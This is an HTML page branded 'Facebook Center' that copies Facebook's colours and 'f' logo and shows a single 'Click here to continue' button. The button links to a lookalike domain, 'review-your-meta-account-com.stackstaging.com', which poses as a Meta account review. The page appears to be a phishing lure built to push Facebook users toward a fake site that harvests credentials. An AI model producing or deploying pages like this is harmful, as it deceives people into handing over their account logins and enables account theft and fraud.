<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Facebook Center</title>
    <link rel="preconnect" href="https://fonts.googleapis.com" />
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin />
    <link
      href="https://fonts.googleapis.com/css2?family=Roboto:wght@700&display=swap"
      rel="stylesheet"
    />
  </head>
  <style>
    body {
      background-color: #316ff6;
    }
    .container {
      max-width: 800px;
      min-width: 300px;
      width: 700px;
      background-color: rgba(180, 179, 179, 0.498);
      max-height: 550px;
      height: 555px;
      margin: auto;
      text-align: center;
      border-radius: 10px;
      display: flex;
      align-items: center;
      vertical-align: center;
      display: block;
    }
    .container a {
      text-decoration: none;
      background-color: #316ff6;
      font-size: 20px;
      width: 200px;
      color: white;
      padding: 10px 20px;
      border-radius: 8px;

      text-align: center;

      display: block;
      margin: auto;
      font-weight: 700;
      margin-left: 240px;
    }
    a:hover {
      transition: all 0.5s ease;
      background-color: rgb(84, 84, 254);
    }
    .fblogo {
      width: 180px;
      height: 180px;
      border-radius: 50%;
      background-color: #316ff6;
      display: flex;
      align-items: center;
      vertical-align: center;
      margin-left: 270px;
    }
    .fbname {
      margin-left: 55px;
      margin-bottom: -40px;
      /* display: block; */
      color: white;
      font-weight: 900;
      font-size: 170px;
      font-family: "Lucida Sans", "Lucida Sans Regular", "Lucida Grande",
        "Lucida Sans Unicode", Geneva, Verdana, sans-serif;
    }
  </style>
  <body>
    <div class="container">
      <br />
      <br />
      <br />
      <div class="fblogo"><span class="fbname">f</span></div>
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <a href="https://review-your-meta-account-com.stackstaging.com"
        >Click here to continue</a
      >
    </div>
  </body>
</html>
